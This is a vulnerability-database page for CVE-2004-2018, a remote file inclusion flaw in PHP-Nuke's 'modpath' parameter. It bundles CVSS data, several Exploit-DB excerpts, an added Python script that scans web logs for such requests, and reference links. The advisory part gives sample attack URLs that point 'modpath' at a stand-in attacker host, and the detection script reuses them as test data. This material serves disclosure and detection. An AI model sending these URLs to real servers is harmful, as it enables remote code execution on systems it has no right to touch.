CVE-2004-2018
Published 2004-12-31
Priority: P3 40 | high | 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.78% (88.6th percentile)
PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath parameter to reference a URL on a remote web server that contains the code.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
No detection rules found.
Exploit-DB
ABC2MTEX 1.6.1 - Command Line Stack Overflow
exploitdb·2019-08-14·CVSS 10.0
CVE-2004-1257 [CRITICAL] ABC2MTEX 1.6.1 - Command Line Stack Overflow
---
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster
An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.
Setup:
$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make
$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free
Exploit-DB
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
exploitdb·2018-12-18·CVSS 7.5
CVE-2018-19862 [HIGH] MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
---
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
Exploit-DB
PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
exploitdb·2004-05-17
CVE-2004-2018 PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
---
source: https://www.securityfocus.com/bid/10365/info
PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.
If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.
http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/
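A log check for the request shape described above, as an added example that is not part of the advisory or of PHP-Nuke: it flags any 'modpath' value that carries a URL scheme or starts with a network-path prefix, including percent-encoded variants. The log format, client addresses and sample lines are constructed, and it assumes legitimate 'modpath' values, if any occur, are relative local paths.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format). The first two request
# targets are the ones quoted in the advisory; the rest are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [17/May/2004:10:01:02 +0000] "GET /nuke73/index.php?modpath=ftp://attacker.com/directory/ HTTP/1.0" 200 512
192.0.2.11 - - [17/May/2004:10:01:05 +0000] "GET /nuke73/index.php?modpath=//attacker_ip/share_name/ HTTP/1.0" 200 512
192.0.2.12 - - [17/May/2004:10:02:00 +0000] "GET /nuke73/index.php?modpath=%68ttp%3A%2F%2Fattacker.com%2F HTTP/1.0" 200 512
192.0.2.13 - - [17/May/2004:10:03:00 +0000] "GET /nuke73/modules.php?name=News&file=article HTTP/1.0" 200 2048
192.0.2.14 - - [17/May/2004:10:04:00 +0000] "POST /nuke73/index.php HTTP/1.0" 200 100
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Off-host reference: any "scheme:" prefix, or a leading // or \\ (network share).
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|[/\\]{2})', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_modpath_inclusion(log_text):
    """Return (client, decoded modpath) for every request with a remote modpath."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl decodes once; fully_decode handles any further layers.
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = fully_decode(value)
            if key.lower() == "modpath" and REMOTE_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_modpath_inclusion(SAMPLE_LOG):
        print(f"{client} requested remote modpath: {value}")
```

The check reads only the query string, so a 'modpath' value sent in a POST body will not appear in a standard access log and needs request-body inspection at a proxy or WAF instead.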
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0870.html
http://marc.info/?l=bugtraq&m=108482888621896&w=2
http://secunia.com/advisories/11625
http://www.osvdb.org/6222
http://www.securityfocus.com/bid/10365
http://www.waraxe.us/index.php?modname=sa&id=29
https://exchange.xforce.ibmcloud.com/vulnerabilities/16218